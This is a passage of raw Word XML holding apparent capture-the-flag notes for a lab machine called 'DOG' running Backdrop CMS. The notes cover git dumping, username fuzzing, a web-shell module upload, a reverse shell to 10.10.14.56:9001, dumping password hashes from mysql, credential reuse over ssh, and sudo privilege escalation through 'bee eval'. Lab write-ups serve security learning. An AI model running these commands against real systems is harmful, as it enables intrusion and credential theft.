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45C0D844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0B30D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DOG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641C6163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0B30D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0019457F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nmap -sC -sV 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0548C213" w:rsidR="00843DCE" w:rsidRDefault="00A07E8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git-dumper </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00676654">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://ip/.git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src/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615D010A" w14:textId="1066927C" w:rsidR="00101B74" w:rsidRDefault="00101B7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vi setting.php = we obtain </w:t>
      </w:r>
      <w:r w:rsidR="007E1DB0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>password = but its not work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F72D72" w14:textId="2977CF7D" w:rsidR="00843DCE" w:rsidRDefault="00B91E4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login with root and obtain the request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169E12F0" w14:textId="29C9FC70" w:rsidR="00B91E46" w:rsidRDefault="00B91E4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just notice on google that how its work base on back</w:t>
      </w:r>
      <w:r w:rsidR="00103697">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>drop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and we obtain /?q=accounts/root so try that with GET method</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>now we show the 403 error on real uers(not in root)(real which post the blogs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428A2BE5" w14:textId="773015A2" w:rsidR="00B91E46" w:rsidRDefault="00B91E4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Then FUZZ after account and save to the dog.req </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1857585F" w14:textId="6DF45CF1" w:rsidR="00BB0343" w:rsidRDefault="00B91E4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Ffuf -request dog.req -request-proto http -w /opt/Seclists/Username/names/names.txt -mc 403</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E159F7" w14:textId="3853AC5B" w:rsidR="00BB0343" w:rsidRDefault="00A61F0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1 user try with the same password which we obtain from mysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E42357E" w14:textId="77777777" w:rsidR="00103697" w:rsidRDefault="00103697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30D50770" w:rsidR="00843DCE" w:rsidRDefault="003F7AD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Search on google backdrop exploit csrf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3150065D" w14:textId="05F7AAE0" w:rsidR="003F7AD0" w:rsidRDefault="003F7AD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Then we obtain the github page so try to notice it then download it as</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F6B749" w14:textId="6F1DB610" w:rsidR="003F7AD0" w:rsidRDefault="003F7AD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Wget paste</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E02786" w14:textId="77777777" w:rsidR="002D2169" w:rsidRDefault="002D2169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7BB33713" w14:textId="77777777" w:rsidR="002D2169" w:rsidRDefault="002D2169" w:rsidP="002D216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in website upload that .tar file </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2554DA67" w14:textId="77777777" w:rsidR="002D2169" w:rsidRDefault="002D2169" w:rsidP="002D216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Then visit the page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434B56B1" w14:textId="77777777" w:rsidR="002D2169" w:rsidRDefault="002D2169" w:rsidP="002D216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/modules/reference/shell.php?cmd=whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C49A3C3" w14:textId="77777777" w:rsidR="002D2169" w:rsidRDefault="002D2169" w:rsidP="002D216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Obtain to the burp suit then edit it as </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701C330C" w14:textId="77777777" w:rsidR="002D2169" w:rsidRDefault="002D2169" w:rsidP="002D216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Bash -c “bash -i &gt;&amp; /dev/tcp/10.10.14.56/9001 0&gt;&amp;1”’ with encode and we obtain the shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DF50F1" w14:textId="77777777" w:rsidR="002D2169" w:rsidRDefault="002D2169" w:rsidP="002D216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Python3 -c “import pty;pty.spawn(“/bin/bash”)’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0630F184" w14:textId="77777777" w:rsidR="002D2169" w:rsidRDefault="002D2169" w:rsidP="002D216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Stty raw -echo;fg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EADFEC4" w14:textId="77777777" w:rsidR="002D2169" w:rsidRDefault="002D2169" w:rsidP="002D216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Export TERM=xterm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4FF623D7" w:rsidR="00843DCE" w:rsidRDefault="002D216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already obtain the mysql so try with it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B60304" w14:textId="6C0CC158" w:rsidR="002D2169" w:rsidRDefault="002D216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Mysql -u root -p xxxxxxxxx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FDE552" w14:textId="3529E2A1" w:rsidR="002D2169" w:rsidRDefault="002D216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Use backdrop;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBAA85A" w14:textId="2FFFDB9B" w:rsidR="00C9026C" w:rsidRDefault="00C9026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Describe users;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494DB648" w14:textId="4BB5826B" w:rsidR="00C9026C" w:rsidRDefault="00C9026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Select name,pass from users;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F337DD7" w14:textId="7821CF09" w:rsidR="00C9026C" w:rsidRDefault="00C9026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the name and password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4A26AF" w14:textId="37E86AD8" w:rsidR="00CD2BBB" w:rsidRDefault="00CD2BB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Ather ways</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F462065" w14:textId="0DE91E7D" w:rsidR="00CD2BBB" w:rsidRDefault="00CD2BB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shell </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1877D2" w14:textId="37DC988C" w:rsidR="00CD2BBB" w:rsidRDefault="00CD2BB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/etc/passwd | grep ‘sh’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF090BD" w14:textId="42BFD704" w:rsidR="00CD2BBB" w:rsidRDefault="00CD2BB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3 username so try ssh with the same password and DONE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3D39186C" w:rsidR="00843DCE" w:rsidRDefault="00975D6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Sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637B1336" w14:textId="62706267" w:rsidR="00975D6B" w:rsidRDefault="00975D6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Notice one path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCF12D8" w14:textId="2C59FF8C" w:rsidR="00975D6B" w:rsidRDefault="00975D6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Path -h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D80261B" w14:textId="43487DF1" w:rsidR="00975D6B" w:rsidRDefault="00975D6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Try to understand it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE1F58E" w14:textId="716A06E1" w:rsidR="00975D6B" w:rsidRDefault="00975D6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/var/www/html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343FE00F" w14:textId="6303FCD1" w:rsidR="00975D6B" w:rsidRDefault="00975D6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Sudo /usr/local/bin/bee eval ‘system(“bash”);’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2036E97F" w14:textId="787EC66F" w:rsidR="007A2B22" w:rsidRDefault="007A2B2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have root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5074E486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4214A56" w14:textId="5BE3E27E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9. Lessons Learned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412A5"/>
    <w:rsid w:val="000B30D5"/>
    <w:rsid w:val="000C3180"/>
    <w:rsid w:val="000D4EBF"/>
    <w:rsid w:val="00101B74"/>
    <w:rsid w:val="00103697"/>
    <w:rsid w:val="0019457F"/>
    <w:rsid w:val="002D2169"/>
    <w:rsid w:val="003F7AD0"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="004C23F5"/>
    <w:rsid w:val="004D3C72"/>
    <w:rsid w:val="004E4FCB"/>
    <w:rsid w:val="007A2B22"/>
    <w:rsid w:val="007E1DB0"/>
    <w:rsid w:val="00817D65"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="008502F4"/>
    <w:rsid w:val="0092285E"/>
    <w:rsid w:val="00975D6B"/>
    <w:rsid w:val="00A07E8B"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00A61F0C"/>
    <w:rsid w:val="00B0591C"/>
    <w:rsid w:val="00B91E46"/>
    <w:rsid w:val="00BB0343"/>
    <w:rsid w:val="00BF6A25"/>
    <w:rsid w:val="00C9026C"/>
    <w:rsid w:val="00CD2BBB"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00F06F13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7E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E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ip/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27</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-12T09:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>